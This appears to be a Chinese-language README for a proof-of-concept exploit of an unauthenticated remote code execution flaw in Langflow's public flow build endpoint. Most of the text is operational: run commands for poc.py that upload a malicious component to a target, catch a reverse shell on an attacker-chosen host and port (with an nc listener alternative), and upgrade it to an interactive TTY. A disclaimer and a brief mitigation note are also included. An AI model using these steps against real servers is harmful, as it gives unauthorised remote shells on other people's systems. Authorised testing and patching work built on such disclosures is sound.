
CVE-2026-33017 Langflow RCE PoC
该 PoC 针对 Langflow 中未认证的 build_public_tmp 代码执行漏洞。它通过向公共流程上传恶意组件,触发构建,并捕获反弹 shell。
仅限授权安全测试。 只对您拥有或获得明确测试许可的系统使用。
requests (pip install requests)运行内置监听器并一次性触发漏洞利用:
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
当 shell 连接时,它 会自动尝试升级为完全交互式 shell。
如果您更愿意使用自己的监听器(例如 nc -lvnp 4444),请去掉 --listen:
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444
CVE-2026-33017 是 Langflow 的 POST /api/v1/build_public_tmp/{flow_id}/flow 端点中的一个未认证 RCE 漏洞,该端点会在没有沙箱的情况下执行流程节点定义中由攻击者提供的 Python。要了解更多信息,请查看以下资源:
以下缓解措施来自 Sysdig 威胁研究文章:
/api/v1/build_public_tmp 端点的网络访问,或完全禁用公共流程构建。此工具仅用于研究和授权渗透测试。作者对滥用或造成的损害不承担任何责任。
| 参数 | 描述 |
|---|
--url | 目标 Langflow 服务器 URL(必填) |
--flow-id | 共享公共流程的 UUID(必填) |
--lhost | 反弹 shell 回调 IP(必填) |
--lport | 反弹 shell 回调端口(必填) |
--listen | 运行内置监听器 |
--timeout | HTTP 请求超时时间(秒,默认 30) |
-k, --insecure | 禁用 TLS 证书验证(自签名/过期证书) |
--no-upgrade | 跳过自动 TTY 升级,使用基础行式 shell |